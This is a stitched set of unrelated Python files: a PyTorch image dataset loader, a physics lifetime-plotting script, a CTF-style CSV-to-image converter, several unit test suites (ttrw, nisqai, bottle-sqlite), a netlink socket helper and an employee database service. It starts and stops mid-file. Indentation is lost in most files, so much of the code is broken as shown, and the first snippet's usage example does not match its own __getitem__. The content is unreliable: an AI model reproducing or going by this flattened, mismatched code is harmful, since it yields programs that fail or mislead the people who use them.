def __getitem__(self, idx):
'''Returns a single image array.
'''
if torch.is_tensor(idx):
idx = idx.tolist()
image = self.image_paths[idx]
if self.image_depth == 1:
image = cv2.imread(image, 0)
else:
image = cv2.imread(image)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = cv2.resize(image, (self.image_size, self.image_size))
if self.transform:
image = self.transform(image)
return image
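# A minimal usage sketch (assumes the folder layout illustrated above and torchvision
# available for the ToTensor transform; the "./dataset" path is hypothetical):
if __name__ == "__main__":
    from torchvision import transforms
    from torch.utils.data import DataLoader
    dataset = LoadDataset("./dataset", image_size=128, image_depth=3, train=True,
                          transform=transforms.ToTensor())
    loader = DataLoader(dataset, batch_size=32, shuffle=True)
    batch = next(iter(loader))
    print(batch['image'].shape, batch['label'].shape)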
|
nilq/baby-python
|
python
|
import numpy as np
from perturbative_solver import solve_oscillon
from matplotlib import pyplot as plt
from progress.bar import Bar
############################################################################
# Edit these parameters:
############################################################################
# the values of the frequency to consider:
w_range = np.linspace(0.5, 0.6, 30)
# the Fourier coefficients of the potential. If they do not sum to one,
# another one will be added to satisfy the sum:
coeffs = np.array([1.0])
# the size of the spatial box:
L = 20.0
# the spatial step size:
dr = 0.01
# number of perturbative harmonics:
N_harmonics = 3
# number of backreaction iterations:
N_iterations = 2
############################################################################
# Compute power curve and lifetime:
############################################################################
def calculate_lifecycle(w_range, coeffs, N_harmonics=3):
"""
Auxiliary function to compute lifetime over a range of frequencies.
"""
power_range = np.empty_like(w_range)
energy_range = np.empty_like(w_range)
# iterate through frequencies and collect power and energy information:
with Bar('Processing', max=len(w_range)) as bar:
for i, w in enumerate(w_range):
R, S1, c_harmonics, S_harmonics, power, energy = solve_oscillon(
w,
coeffs=coeffs,
N_iterations=N_iterations,
N_harmonics=N_harmonics,
dr=dr,
L=L)
power_range[i] = power
energy_range[i] = energy
bar.next()
bar.finish()
# lifetime is only integrated over segments of decreasing energy:
lifetime = -(np.diff(energy_range)[np.diff(energy_range) < 0] /
power_range[1:][np.diff(energy_range) < 0]).sum()
print(np.log10(lifetime))
return np.log10(lifetime), power_range, energy_range
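# Worked numeric illustration of the lifetime estimate above (values are made up):
# with energy_range = [3.0, 2.0, 2.5, 1.0] and power_range = [0.5, 0.5, 0.5, 0.5],
# np.diff(energy_range) = [-1.0, 0.5, -1.5]; only the decreasing segments (-1.0 and -1.5)
# contribute, so lifetime = -((-1.0)/0.5 + (-1.5)/0.5) = 5.0 and log10(lifetime) ≈ 0.7.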
if __name__ == '__main__':
# add the coefficient to satisfy the sum-to-one criterion, if needed:
if coeffs.sum() != 1.0:
coeffs = np.hstack((coeffs, [1.0 - coeffs.sum()]))
log10lifetime, power_curve, energy_curve = calculate_lifecycle(
w_range, coeffs)
print('log10(lifetime)=', log10lifetime)
# plot decreasing-energy and increasing-energy segments separately:
for i in range(len(power_curve) - 1):
if energy_curve[i + 1] - energy_curve[i] <= 0:
plt.plot(w_range[[i, i + 1]],
power_curve[[i, i + 1]],
'b-',
lw=2.0)
else:
plt.plot(w_range[[i, i + 1]],
power_curve[[i, i + 1]],
'r--',
lw=1.0,
alpha=0.5)
plt.xlabel('Frequency (m)', fontsize=14)
plt.ylabel(r'Power ($f^2$)', fontsize=14)
plt.yscale('log')
plt.show()
|
nilq/baby-python
|
python
|
from PIL import Image
from csv import reader
inputFilename: str = "./dist/flag.csv"
outputFilename: str = "./writeup/flag.png"
with open(inputFilename, "r") as csv_file:
csv_reader = reader(csv_file)
list_of_rows = list(csv_reader)
size = [len(list_of_rows[0]), len(list_of_rows)]
outputImage: Image = Image.new("RGB", size)
with open(outputFilename, mode="w") as f:
for x in range(size[0]):
for y in range(size[1]):
cell = list_of_rows[y][x].zfill(6)
r: int = int(cell[:2], 16)
g: int = int(cell[2:4], 16)
b: int = int(cell[4:], 16)
outputImage.putpixel((x, y), (r, g, b))
outputImage.save(outputFilename)
print("finish writeout to " + outputFilename)
|
nilq/baby-python
|
python
|
import unittest
import ttrw
from unittest.mock import patch
test_dictionary = {
"en": {
"adverbs": ["test"],
"adjectives": ["test"],
"nouns": ["test"]
},
"pl": {
"adverbs": ["bardzo"],
"adjectives": ["maly"],
"nouns": ["ksiazka"]
}
}
class TestTTRW(unittest.TestCase):
def test_supported_language(self):
for lang in ttrw.languages:
s = ttrw.get_random_words(lang)
self.assertGreater(len(s), 0)
self.assertTrue(type(s) is str)
def test_unsupported_language(self):
self.assertRaises(ValueError, lambda: ttrw.get_random_words("xxx"))
def test_fake_dic(self):
with patch.dict("ttrw.words", test_dictionary):
s = ttrw.get_random_words("en")
self.assertEqual(s, "TestTestTest")
def test_polish_gend(self):
with patch.dict("ttrw.words", test_dictionary):
s = ttrw.get_random_words("pl")
self.assertEqual(s, "BardzoMalaKsiazka")
if __name__ == '__main__':
unittest.main()
|
nilq/baby-python
|
python
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from numpy import array, ndarray
import unittest
from pyquil import Program, get_qc
from pyquil.gates import X, MEASURE
from nisqai.measure._measurement_outcome import MeasurementOutcome
class TestMeasurementOutcome(unittest.TestCase):
@staticmethod
def get_all_zeros_outcome(nqubits, nshots):
"""Helper function that returns the outcome of all zeros.
Args:
nqubits : int
Number of qubits in the circuit.
nshots : int
Number of shots to simulate the circuit.
"""
prog = Program()
creg = prog.declare("ro", memory_type="BIT", memory_size=nqubits)
prog += [MEASURE(q, creg[q]) for q in range(nqubits)]
prog.wrap_in_numshots_loop(nshots)
computer = get_qc("{}q-qvm".format(nqubits))
return computer.run(prog)
@staticmethod
def get_all_ones_outcome(nqubits, nshots):
"""Helper function that returns the outcome of all ones.
Args:
nqubits : int
Number of qubits in the circuit.
nshots : int
Number of shots to simulate the circuit.
"""
prog = Program()
creg = prog.declare("ro", memory_type="BIT", memory_size=nqubits)
prog += [X(q) for q in range(nqubits)]
prog += [MEASURE(q, creg[q]) for q in range(nqubits)]
prog.wrap_in_numshots_loop(nshots)
computer = get_qc("{}q-qvm".format(nqubits))
return computer.run(prog)
def test_basic(self):
"""Tests that a MeasurementOutcome can be instantiated."""
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(4, 10)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
# trivial check
self.assertTrue((outcome.raw_outcome == result).all())
def test_num_qubits(self):
"""Tests that a MeasurementOutcome has the right qubit number."""
# number of qubits
nqubits = 4
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits, 10)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
# trivial check
self.assertEqual(outcome.num_qubits, nqubits)
def test_num_shots(self):
"""Tests that a MeasurementOutcome has the right number of shots."""
# number of qubits
nqubits = 4
# number of shots
nshots = 40
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits, nshots)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
# trivial check
self.assertEqual(outcome.shots, nshots)
def test_get_item(self):
"""Tests getting an item from a measurement outcome."""
# number of qubits
nqubits = 5
# number of shots
nshots = 40
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits, nshots)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
self.assertEqual(len(outcome[0]), 5)
def test_len(self):
"""Tests the length of a measurement outcome."""
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits=2, nshots=1000)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
self.assertEqual(len(outcome), 1000)
def test_as_int(self):
"""Tests the integer value of bit strings is correct."""
# get some measurement outcomes
zeros = MeasurementOutcome(self.get_all_zeros_outcome(nqubits=2, nshots=20))
ones = MeasurementOutcome(self.get_all_ones_outcome(nqubits=2, nshots=20))
# checks for zeros
self.assertTrue(type(zeros.as_int(0)), int)
self.assertEqual(zeros.as_int(0), 0)
# checks for ones
self.assertTrue(type(ones.as_int(0)), int)
self.assertEqual(ones.as_int(0), 3)
def test_as_int_big_int(self):
"""Tests the integer value of bit strings for large integers."""
# get a measurement outcome
ones = MeasurementOutcome(self.get_all_ones_outcome(nqubits=10, nshots=20))
# checks for ones
self.assertTrue(type(ones.as_int(0)), int)
self.assertEqual(ones.as_int(0), 2**10 - 1)
def test_average_all_zeros(self):
"""Tests the average outcome of all zero measurements is all zeros."""
# Get an all zero MeasurementOutcome
zeros = MeasurementOutcome(self.get_all_zeros_outcome(nqubits=4, nshots=20))
# Compute the average
avg = zeros.average()
# Make sure it's all zeros
self.assertTrue(type(avg) == ndarray)
self.assertEqual(len(avg), zeros.num_qubits)
self.assertTrue(sum(avg) == 0)
def test_average_all_ones(self):
"""Tests the average outcome of all ones measurements is all ones."""
# Get an all zero MeasurementOutcome
ones = MeasurementOutcome(self.get_all_ones_outcome(nqubits=4, nshots=20))
# Compute the average
avg = ones.average()
        # Make sure it's all ones
self.assertTrue(type(avg) == ndarray)
self.assertEqual(len(avg), ones.num_qubits)
self.assertTrue(sum(avg) == ones.num_qubits)
def test_average(self):
"""Tests that the average is computed correctly for a given raw outcome."""
# Example result
result = array([[1, 0], [0, 1]])
# Make a MeasurementOutcome
meas = MeasurementOutcome(result)
# Compute the average
avg = meas.average()
        # Make sure it's correct
self.assertAlmostEqual(avg[0], 0.5)
self.assertAlmostEqual(avg[1], 0.5)
if __name__ == "__main__":
unittest.main()
|
nilq/baby-python
|
python
|
import graphene
from graphql_auth.bases import MutationMixin, DynamicArgsMixin
from users.mixins import PasswordSetAdminMixin
class PasswordSetAdmin(MutationMixin, DynamicArgsMixin, PasswordSetAdminMixin, graphene.Mutation):
_required_args = ["new_password1", "new_password2"]
class Arguments:
id = graphene.ID(required=True)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import os
import unittest
import sqlite3
import tempfile
import bottle
from bottle.ext import sqlite
''' Python 3 renamed unicode to str; alias it below for compatibility '''
try:
unicode
except NameError:
unicode = str
class SQLiteTest(unittest.TestCase):
def setUp(self):
self.app = bottle.Bottle(catchall=False)
_, dbfile = tempfile.mkstemp(suffix='.sqlite')
self.plugin = self.app.install(sqlite.Plugin(dbfile=dbfile))
self.conn = sqlite3.connect(dbfile)
self.conn.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
self.conn.commit()
def tearDown(self):
os.unlink(self.plugin.dbfile)
def test_with_keyword(self):
@self.app.get('/')
def test(db):
self.assertEqual(type(db), type(sqlite3.connect(':memory:')))
self._request('/')
def test_without_keyword(self):
@self.app.get('/')
def test_1():
pass
self._request('/')
@self.app.get('/2')
def test_2(**kw):
self.assertFalse('db' in kw)
self._request('/2')
def test_install_conflicts(self):
self.app.install(sqlite.Plugin(keyword='db2'))
@self.app.get('/')
def test(db, db2):
pass
# I have two plugins working with different names
self._request('/')
def test_text_factory(self):
        # set text factory to str; with unicode (the default) sqlite3 would raise
        # ProgrammingError: You must not use 8-bit bytestrings .. exception
self.app.install(sqlite.Plugin(keyword='db2',text_factory=str))
@self.app.get('/')
def test(db, db2):
char = 'ööö'
db2.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
db2.execute("INSERT INTO todo (id,task) VALUES ('1',:TEST)", { "TEST": char })
count = len(db2.execute("SELECT * FROM todo").fetchall())
self.assertEqual(count, 1)
self._request('/')
def test_text_factory_fail(self):
self.app.install(sqlite.Plugin(keyword='db3',text_factory=unicode))
@self.app.get('/')
def test(db, db3):
char = 'ööö'
db3.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
try:
db3.execute("INSERT INTO todo (id,task) VALUES ('1',:TEST)", { "TEST": char })
except sqlite3.ProgrammingError as e:
pass
self._request('/')
def test_user_functions(self):
class SumSq:
def __init__(self):
self.result = 0
def step(self, value):
if value:
self.result += value**2
def finalize(self):
return self.result
def collate_reverse(string1, string2):
if string1 == string2:
return 0
elif string1 < string2:
return 1
else:
return -1
testfunc1 = lambda: 'test'
testfunc2 = lambda x: x + 1
self.app.install(sqlite.Plugin(
keyword='db4',
functions={'testfunc1': (0, testfunc1), 'testfunc2': (1, testfunc2)},
aggregates={'sumsq': (1, SumSq)},
collations={'reverse': collate_reverse},
))
@self.app.get('/')
def test(db, db4):
db4.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
result = db4.execute("SELECT testfunc1(), testfunc2(2)").fetchone()
self.assertEqual(tuple(result), ('test', 3))
db4.execute("INSERT INTO todo VALUES (10, 'a')")
db4.execute("INSERT INTO todo VALUES (11, 'a')")
db4.execute("INSERT INTO todo VALUES (12, 'a')")
result = db4.execute("SELECT sumsq(id) FROM todo WHERE task='a'").fetchone()
self.assertEqual(tuple(result), (365,))
result = db4.execute("SELECT ('a' < 'b' COLLATE reverse)").fetchone()
self.assertEqual(tuple(result), (0,))
self._request('/')
def test_raise_sqlite_integrity_error(self):
@self.app.get('/')
def test(db):
# task can not be null, raise an IntegrityError
db.execute("INSERT INTO todo (id) VALUES (1)")
# TODO: assert HTTPError 500
self._request('/')
self.assert_records(0)
def test_autocommit(self):
@self.app.get('/')
def test(db):
self._insert_into(db)
self._request('/')
self.assert_records(1)
def test_not_autocommit(self):
@self.app.get('/', sqlite={'autocommit': False})
def test(db):
self._insert_into(db)
self._request('/')
self.assert_records(0)
def test_commit_on_redirect(self):
@self.app.get('/')
def test(db):
self._insert_into(db)
bottle.redirect('/')
self._request('/')
self.assert_records(1)
def test_commit_on_abort(self):
@self.app.get('/')
def test(db):
self._insert_into(db)
bottle.abort()
self._request('/')
self.assert_records(0)
def _request(self, path, method='GET'):
return self.app({'PATH_INFO': path, 'REQUEST_METHOD': method},
lambda x, y: None)
def _insert_into(self, db):
sql = "INSERT INTO todo (task) VALUES ('PASS')"
db.execute(sql)
def assert_records(self, count):
cursor = self.conn.execute("SELECT COUNT(*) FROM todo")
self.assertEqual((count,), cursor.fetchone())
if __name__ == '__main__':
unittest.main()
|
nilq/baby-python
|
python
|
# This code is designed to compare the absolute difference between one
# reference burn_cell test and multiple other burn_cell tests.
# burn_cell_testing.py must be run before running this.
# Around line 195, you choose which species' xn and ydot to compare.
# To change what you investigate, change which indices of
# short_spec_names you iterate over.
#
# This code is not designed to analyze the error between tests from two networks
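#
# Illustrative invocation (not part of the original source; the script name,
# run prefix and time limits below are assumptions):
#
#   python compare_burn_cell_abs.py my_run --logtime --tlo 1.0e-12 --thi 1.0
#
# where my_run_testprefixes.txt, my_run_<prefix>_xn<i>.txt, etc. were produced
# beforehand by burn_cell_testing.py.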
#!/usr/bin/env python
from __future__ import print_function
import argparse
import glob
import numpy as np
from cycler import cycler
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser()
parser.add_argument('runprefix', type=str,
help='Prefix of the output run files. We look for files named as [prefix]_[0-9]*')
parser.add_argument('--filenum', action='store_true', help='If --filenum, plot vs. file number')
parser.add_argument('--logtime', action='store_true', help='If --logtime, plot Log10(time).')
parser.add_argument('--tlo', type=float, help='Time lower limit')
parser.add_argument('--thi', type=float, help='Time upper limit')
parser.add_argument('--nlo', type=float, help='File num lower limit')
parser.add_argument('--nhi', type=float, help='File num upper limit')
args = parser.parse_args()
# Initializing variables and loading in data
print('Initializing')
runprefix = args.runprefix
file_testprefixes = open('{}_testprefixes.txt'.format(runprefix), 'r')
testprefixes = []
for line in file_testprefixes:
testprefixes.append('{}'.format(line.strip()))
file_testprefixes.close()
file_specs = open('{}_{}_short_spec_names.txt'.format(runprefix, testprefixes[0]), 'r')
short_spec_names = []
for line in file_specs:
short_spec_names.append(line.strip())
file_specs.close()
nspec = len(short_spec_names)
inputs = []
for i in range(len(testprefixes)):
# i corresponds to the index of a test prefix
inputs.append([])
file_inputs = open('{}_{}_inputs.txt'.format(runprefix, testprefixes[i]))
for line in file_inputs:
inputs[i].append('{}'.format(line.strip()))
file_inputs.close()
# Init time, temp, ener, xn, ydot
xn = []
ydot = []
fnum = []
temp = []
dtime = []
time = []
ener = []
denerdt = []
for prefix in range(len(testprefixes)):
xn.append([])
ydot.append([])
for n in range(nspec):
xn[prefix].append(np.loadtxt('{}_{}_xn{}.txt'.format(args.runprefix, testprefixes[prefix], n)))
ydot[prefix].append(np.loadtxt('{}_{}_ydot{}.txt'.format(args.runprefix, testprefixes[prefix], n)))
temp.append(np.loadtxt('{}_{}_temp.txt'.format(args.runprefix, testprefixes[prefix])))
ener.append(np.loadtxt('{}_{}_ener.txt'.format(args.runprefix, testprefixes[prefix])))
denerdt.append(np.loadtxt('{}_{}_denerdt.txt'.format(args.runprefix, testprefixes[prefix])))
dtime = np.loadtxt('{}_{}_dtime.txt'.format(args.runprefix, testprefixes[0]))
time = np.loadtxt('{}_{}_time.txt'.format(args.runprefix, testprefixes[0]))
fnum = np.loadtxt('{}_{}_fnum.txt'.format(args.runprefix, testprefixes[0]))
## Define RGBA to HEX
def rgba_to_hex(rgba):
r = int(rgba[0]*255.0)
g = int(rgba[1]*255.0)
b = int(rgba[2]*255.0)
return '#{:02X}{:02X}{:02X}'.format(r,g,b)
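# Worked example (illustrative): rgba_to_hex((1.0, 0.5, 0.0, 1.0)) returns '#FF7F00',
# since int(1.0*255) -> 0xFF, int(0.5*255) = 127 -> 0x7F, and int(0.0*255) -> 0x00.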
## PLOTTING
# Figure out time axis limits
if args.tlo and args.thi:
ltlim = [args.tlo, args.thi]
elif args.tlo:
ltlim = [args.tlo, time[-1]]
elif args.thi:
ltlim = [time[0], args.thi]
else:
ltlim = [time[0], time[-1]]
if args.logtime:
time = np.log10(time)
ltlim = np.log10(ltlim)
# Number axis limits
if args.nlo and args.nhi:
fnlim = [args.nlo, args.nhi]
elif args.nlo:
    fnlim = [args.nlo, fnum[-1]]
elif args.nhi:
    fnlim = [fnum[0], args.nhi]
else:
fnlim = [fnum[0], fnum[-1]]
# Time or file number selection
if args.filenum or args.nlo or args.nhi:
plot_vs_fnum = True
xlabel = r'$\mathrm{Output \#}$'
xvec = fnum
xlim = fnlim
else:
xvec = time
xlim = ltlim
    if args.logtime:
        xlabel = r'$\mathrm{Log_{10}~Time~(s)}$'
else:
xlabel = r'$\mathrm{Time~(s)}$'
# Get set of colors to use for abundances
cm = plt.get_cmap('nipy_spectral')
clist = [cm(1.0*i/nspec) for i in range(nspec)]
hexclist = [rgba_to_hex(ci) for ci in clist]
# Initialize figures and axes for the future plots
plt.figure(1, figsize=(6,9))
ax = plt.subplot(211)
ax.set_prop_cycle(cycler('color', hexclist))
errx = plt.subplot(212)
errx.set_prop_cycle(cycler('color', hexclist))
plt.figure(2, figsize=(6,9))
ay = plt.subplot(211)
ay.set_prop_cycle(cycler('color', hexclist))
erry = plt.subplot(212)
erry.set_prop_cycle(cycler('color', hexclist))
plt.figure(3, figsize=(5,9))
aT = plt.subplot(211)
errT = plt.subplot(212)
plt.figure(4, figsize=(5,9))
ae = plt.subplot(211)
erre = plt.subplot(212)
# Initialize arrays to contain values for plotting
diffx = []
diffydot = []
difftemp = []
diffdenerdt = []
line_styles = ['solid', 'dashed', 'dotted', 'dashdot']
# Plotting the reference data
print('Plotting the reference data from: {}'.format(testprefixes[0]))
for x in range(len(short_spec_names)):
# x corresponds to each molecule in the list of species
plt.figure(1)
ax.semilogy(xvec, xn[0][x], label='{}-{}'.format(short_spec_names[x], testprefixes[0]), linestyle = line_styles[0])
plt.figure(2)
ay.semilogy(xvec, ydot[0][x], label='{}-{}'.format(short_spec_names[x], testprefixes[0]), linestyle = line_styles[0])
plt.figure(3)
aT.semilogy(xvec, temp[0], label=testprefixes[0], linestyle = line_styles[0])
plt.figure(4)
ae.semilogy(xvec, denerdt[0], label=testprefixes[0], linestyle = line_styles[0])
# Plotting the data compared to reference and the error
for i in range(1, len(testprefixes)):
    # In this context i corresponds to a test prefix to be compared
# to the data from a chosen data set
print('Plotting data from: {}'.format(testprefixes[i]))
difftemp.append([])
diffdenerdt.append([])
for n in range(len(xvec)):
# n is for every time step from 0 to tmax
difftemp[i-1].append(abs(temp[0][n] - temp[i][n]))
diffdenerdt[i-1].append(abs(denerdt[0][n] - denerdt[i][n]))
plt.figure(3)
# Uncomment the following line and the commented ae, ax, and ay
# to add additional graphs to the top graph in the output files
#aT.semilogy(xvec, temp[i], label=testprefixes[i], linestyle = line_styles[i])
errT.semilogy(xvec, difftemp[i-1], label=testprefixes[i], linestyle = line_styles[i-1])
plt.figure(4)
#ae.semilogy(xvec, denerdt[i], label=testprefixes[i], linestyle = line_styles[i])
erre.semilogy(xvec, diffdenerdt[i-1], label=testprefixes[i], linestyle = line_styles[i-1])
diffx.append([])
diffydot.append([])
    # This is where you choose which species' xn and ydot to investigate
for x in range(nspec):
# x is for each species involved
diffx[i-1].append([])
diffydot[i-1].append([])
for n in range(len(xvec)):
# n is for every time step from 0 to tmax
diffx[i-1][x].append(abs(xn[0][x][n] - xn[i][x][n]))
diffydot[i-1][x].append(abs(ydot[0][x][n] - ydot[i][x][n]))
plt.figure(1)
#ax.semilogy(xvec, xn[i][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i])
errx.semilogy(xvec, diffx[i-1][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i-1])
plt.figure(2)
#ay.semilogy(xvec, ydot[i][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i])
erry.plot(xvec, diffydot[i-1][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i-1])
# Mass Fraction Figure
print('Compiling Mass Fraction graph.')
plt.figure(1)
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])
ax.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
ax.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=ax.transAxes)
ax.set_xlabel(xlabel, fontsize=10)
ax.set_ylabel('$\\mathrm{Log_{10} X}$', fontsize=10)
ax.set_title('Mass Fraction')
ax.set_xlim(xlim)
ax.tick_params(axis='both', which='both', labelsize=5)
box = errx.get_position()
errx.set_position([box.x0, box.y0, box.width * 0.8, box.height])
errx.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
errx.set_xlabel(xlabel, fontsize=10)
errx.set_ylabel('$\\mathrm{Log_{10} X}$', fontsize=10)
errx.set_title('Absolute Errors in Mass Fraction', fontsize=15)
errx.set_xlim(xlim)
errx.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_xn_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
# Molar Fractions
print('Compiling Molar Fraction graph.')
plt.figure(2)
box = ay.get_position()
ay.set_position([box.x0, box.y0, box.width * 0.8, box.height])
ay.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
ay.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=ay.transAxes)
ay.set_xlabel(xlabel, fontsize=10)
ay.set_ylabel('$\\mathrm{Log_{10} \\dot{Y}}$', fontsize=10)
ay.set_title('Molar Fraction')
ay.set_xlim(xlim)
ay.tick_params(axis='both', which='both', labelsize=5)
box = erry.get_position()
erry.set_position([box.x0, box.y0, box.width * 0.8, box.height])
erry.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
erry.set_xlabel(xlabel, fontsize=10)
erry.set_ylabel('$\\mathrm{Log_{10} \\dot{Y}}$', fontsize=10)
erry.set_title('Absolute Errors in Molar Fraction', fontsize=15)
erry.set_xlim(xlim)
erry.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_y_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
# Temperature Figure
print('Compiling Temperature graph.')
plt.figure(3)
aT.legend(loc='upper left', fontsize = 5)
aT.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=aT.transAxes)
aT.set_xlabel(xlabel, fontsize=10)
aT.set_ylabel('$\\mathrm{Log_{10} T~(K)}$', fontsize=10)
aT.set_title('Temperature')
aT.set_xlim(xlim)
aT.tick_params(axis='both', which='both', labelsize=5)
errT.legend(loc='upper left', fontsize = 5)
errT.set_prop_cycle(cycler('color', hexclist))
errT.set_xlabel(xlabel, fontsize=10)
errT.set_ylabel('$\\mathrm{Log_{10} T~(K)}$', fontsize=10)
errT.set_title('Absolute Error in Temperature', fontsize=15)
errT.set_xlim(xlim)
errT.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_T_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
# Energy Generation Rate
print('Compiling Energy Generation Rate graph.')
plt.figure(4)
ae.legend(loc='upper left', fontsize = 5)
ae.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=ae.transAxes)
ae.set_prop_cycle(cycler('color', hexclist))
ae.set_xlabel(xlabel, fontsize=10)
ae.set_ylabel('$\\mathrm{Log_{10} \\dot{e}~(erg/g/s)}$', fontsize=10)
ae.set_title('Energy Generation Rate')
ae.set_xlim(xlim)
ae.tick_params(axis='both', which='both', labelsize=5)
erre.legend(loc='upper left', fontsize = 5)
erre.set_prop_cycle(cycler('color', hexclist))
erre.set_xlabel(xlabel, fontsize=10)
erre.set_ylabel('$\\mathrm{Log_{10} \\dot{e}~(erg/g/s)}$', fontsize=10)
erre.set_title('Absolute Error in Energy Generation Rate', fontsize=15)
erre.set_xlim(xlim)
erre.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_edot_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
|
nilq/baby-python
|
python
|
#!/usr/bin/python
import socket,os
import platform
""" NETLINK related stuff
Astrit Zhushi 2011, a.zhushi@cs.ucl.ac.uk
"""
NETLINK_CONNECTOR=11
NETLINK_ADD_MEMBERSHIP=1
def get_cn_idx_iwlagn():
uname = platform.uname()[2]
infile = open("/usr/src/linux-headers-%s/include/linux/connector.h"
%(uname), "r")
flag = False
for line in infile:
if line.find("CN_IDX_IWLAGN") == -1:
continue
line = line.strip().split()
CN_IDX_IWLAGN = eval(line[2])
flag = True
break
infile.close()
if flag:
return CN_IDX_IWLAGN
raise IOError("CN_IDX_IWLAGN not found in connector.h")
def get_iwlnl_socket() :
CN_IDX_IWLAGN = get_cn_idx_iwlagn()
s = socket.socket(socket.AF_NETLINK, socket.SOCK_DGRAM, NETLINK_CONNECTOR)
pid = os.getpid()
s.bind((pid,CN_IDX_IWLAGN))
s.setsockopt(270, NETLINK_ADD_MEMBERSHIP, CN_IDX_IWLAGN)
return s
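# ----------------------------------------------------------------------------
# Minimal usage sketch (illustrative only, not part of the original module):
# bind to the iwlagn connector group and block until a netlink message arrives.
# The 4096-byte buffer size is an assumption, not a protocol requirement.
#
#   if __name__ == '__main__':
#       sock = get_iwlnl_socket()
#       data = sock.recv(4096)
#       print("received %d bytes" % len(data))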
|
nilq/baby-python
|
python
|
"""
Employee service.
"""
from department_app import db
from department_app.models.department import Department
from department_app.models.employee import Employee
def add_employee_service(forename, surname, birthdate, department_id, salary):
"""
Adds employee to db.
:param forename: employee first name
    :param surname: employee surname
:param birthdate: employee birthdate
:param salary: employee salary
:param department_id: employee department id
:return: None
"""
employee = Employee(
forename=forename,
surname=surname,
birthdate=birthdate,
salary=salary,
        department_id=department_id
)
db.session.add(employee)
db.session.commit()
def update_employee_service(employee_id, forename=None, surname=None, birthdate=None, salary=None, department_id=None):
"""
Updates employee into db.
:param employee_id: employee id
:param forename: employee first name
    :param surname: employee surname
:param birthdate: employee birthdate
:param salary: employee salary
:param department_id: employee department id
:return: None
"""
employee = Employee.query.get_or_404(employee_id)
if forename:
employee.forename = forename
if surname:
employee.surname = surname
if birthdate:
employee.birthdate = birthdate
if salary:
employee.salary = salary
if department_id:
employee.department_id = department_id
db.session.add(employee)
db.session.commit()
def get_employee_by_id_service(employee_id):
"""
Returns employee from db.
:param employee_id: employee id
:return: employee
"""
return Employee.query.filter_by(id=employee_id).first()
def get_by_birthdate_service(date_from, date_to):
"""
Returns all employees with birthdate in mentioned period from db.
:param date_from: start_date
:param date_to: end_date
:return: list of all employees with birthdate in mentioned period
"""
return Employee.query.filter(Employee.birthdate.between(date_from, date_to)).all()
def get_all_employees_service():
"""
Returns all employees from db.
:return: list of all employees
"""
return Employee.query.all()
def delete_employee_service(employee_id):
"""
Deletes employee in db.
:param employee_id: employee id
:return: None
"""
employee = Employee.query.get_or_404(employee_id)
db.session.delete(employee)
db.session.commit()
def employee_to_dict(employee_id):
"""
Returns employee dictionary representation.
:param employee_id: employee id
:return: employee dictionary representation
"""
employee = get_employee_by_id_service(employee_id)
return {
'id': employee.id,
'forename': employee.forename,
'surname': employee.surname,
'birthdate': employee.birthdate.strftime('%Y-%m-%d'),
'salary': employee.salary,
'department': Department.query.get_or_404(employee.department_id).name
}
def get_all_employees_for_department(department_id):
"""
Returns all employees in the department from database.
:param department_id: department id
:return: list of all employees in the department
"""
return Employee.query.filter_by(department_id=department_id).all()
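# ----------------------------------------------------------------------------
# Minimal usage sketch (illustrative; assumes a Flask application context and
# an existing department with id 1 -- neither is defined in this module):
#
#   import datetime
#   from department_app import app
#   with app.app_context():
#       add_employee_service('Ada', 'Lovelace', datetime.date(1815, 12, 10),
#                            department_id=1, salary=5000)
#       print([e.surname for e in get_all_employees_for_department(1)])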
|
nilq/baby-python
|
python
|
### tensorflow==2.3.1
import tensorflow as tf
import tensorflow_datasets as tfds
import numpy as np
def representative_dataset_gen_480x640():
for data in raw_test_data.take(10):
